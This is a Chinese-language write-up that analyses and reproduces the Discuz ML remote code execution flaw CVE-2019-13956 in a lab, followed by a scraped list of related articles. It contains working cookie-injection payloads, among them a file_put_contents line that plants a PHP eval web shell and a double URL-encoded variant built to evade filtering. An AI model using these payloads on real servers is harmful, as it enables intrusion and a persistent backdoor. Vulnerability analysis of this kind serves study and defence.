Discuz远程代码执行(CVE-2019-13956)
漏洞介绍:
该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。
利用的vulnfocus 的环境。
漏洞分析:
漏洞出现在 /upload/source/module/portal/portal_index.php
include_once 对template()函数的返回对象进行了包含,如果包含的内容可控的话,就会存在命令执行。
跟进 template
这里返回的是 DISCUZ_ROOT . $cachefile ;
发现该函数返回了一个缓存文件,跟进缓存文件。
这个缓存的文件名$cachefile是由 discuz_lang 拼接而成的
$cachefile = './data/template/'.DISCUZ_LANG.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';
也就是说,我们能控制这个 discuz_LANG 就能rce
查看DISCUZ_LANG的值:
跟进$LNG
发现他是cookie 里的language获得的, 而cookie 可以在bp里修改。至此漏洞存在。
思路 $lng -> discuz_LANG 拼接成 $cachefile 而$cachefile 被include_once包含。
漏洞复现:
将 R4jx_2132_language=sc
修改为 : sc'.phpinfo().'
至于为什么要 加这个 单引号,因为我们分析过,缓存文件名的组成是由:
'./data/template/'.DISCUZ_LANG.'_'
组成的。
所以我们加入后的语句就为:
'./data/temlpate/'.'sc'.phpinfo().''_'
这样就能成功执行phpinfo()
测试成功。
可以 试着往里面写个马
sc'.file_put_contents("shell.php","<?php eval($_POST[1]);?>").'
发现 系统报错了,可能检测到了危险函数。把我们的一句话过滤掉了。
我们使用url编码绕过,将(POST , eval) 编码为url 的格式。
'.file_put_contents("shell.php",urldecode('%3C%3Fphp%20%65%76%61%6c%28%24_%50%4f%53%54%5Bcmd%5D%29%3B%3F%3E')).'
因为服务器会自动解码一次,所以我们要再次url 编码:
%27.file_put_contents%28%22shell.php%22%2Curldecode%28%27%253C%253Fphp%2520%2565%2576%2561%256c%2528%2524_%2550%254f%2553%2554%255Bcmd%255D%2529%253B%253F%253E%27%29%29.%27
传入cookie:
蚁剑连一下我们的shell.php
Discuz远程代码执行(CVE-2019-13956)相关推荐
- Discuz! 7.1 7.2 远程代码执行漏洞
首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来的都是代码执行,1月5日夜里11点多钟,在核心群的黑客们的要求下,xhming给了个poc,我给了个exp,确实 ...
- php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限
此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...
- windows server 2012 远程连不上_CVE20201350 | Windows DNS Server远程代码执行漏洞通告
0x00 漏洞概述 CVE ID CVE-2020-1350 时 间 2020-07-15 类 型 RCE 等 级 严重 远程利用 是 影响范围 0x01 漏洞详情 微软于 ...
- CVE-2021-1675: Windows Print Spooler远程代码执行漏洞
** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日 ...
- CVE-2021-34527: Windows Print Spooler 蠕虫级远程代码执行漏洞
报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-02 1 更新概览 1.漏洞简述新增360CERT对CVE-2021-34527( ...
- Microsoft Remote Procedure Call Runtime 远程代码执行漏洞(CVE-2022-26809)
CVE-2022-26809 RCE CVE 描述 CVE-2022-26809 - 核心 Windows 组件 (RPC) 的弱点获得 9.8 的 CVSS 分数并非没有原因,因为攻击不需要身份验证 ...
- 绿盟安全事件响应观察及远程代码执行漏洞
人和管理成为主要入侵突破口 安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件 中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不 ...
- 微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)(MPS-2023-1376)
漏洞描述 Internet Control Message Protocol (ICMP) 协议是TCP/IP协议簇的一个子协议,用于在IP主机.路由器之间传递控制消息.raw socket 是一种网 ...
- 微软远程桌面服务远程代码执行漏洞
人和管理成为主要入侵突破口 安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不当 ...
最新文章
- 不相交集类以及应用迷宫生成
- QApplicationQPushButton
- PCB Editor 布线后操作
- 爱上MVC~为非法进行Action的用户提供HttpStatusCodeResult
- 稀疏表示介绍(中)、(下)
- php sdk微信,GitHub - swayer/wechat-php-sdk: 微信公众平台 PHP SDK
- [深度学习-实践]条件生成对抗网络cGAN的例子-Tensorflow2.x Keras
- cdoj1342郭大侠与甲铁城
- Linux kali2021 密码学PBC库安装
- NotePad++ 正则表达式
- 系统维护模式修改/etc/fstab
- python模拟手机屏幕滑动_Python 封装Swipe实现手机屏幕滑动操作
- codewars练习(javascript)-2021/3/23
- iOS自定义身份证键盘
- 搭建美丽天天秒链动2+1OpenRApp开发
- 和外国人聊天的简化英语
- 【odoo15】由于目标计算机积极拒绝,无法连接。
- 阿里最受追捧的「中高级技术核心」,助我拿下菜网offer,附面经
- ASEMI整流桥ABS10、ABS210、DB107S详细参数对比
- 淘宝网和铁道部订票网站采用什么技术架构来实现网站高负载的呢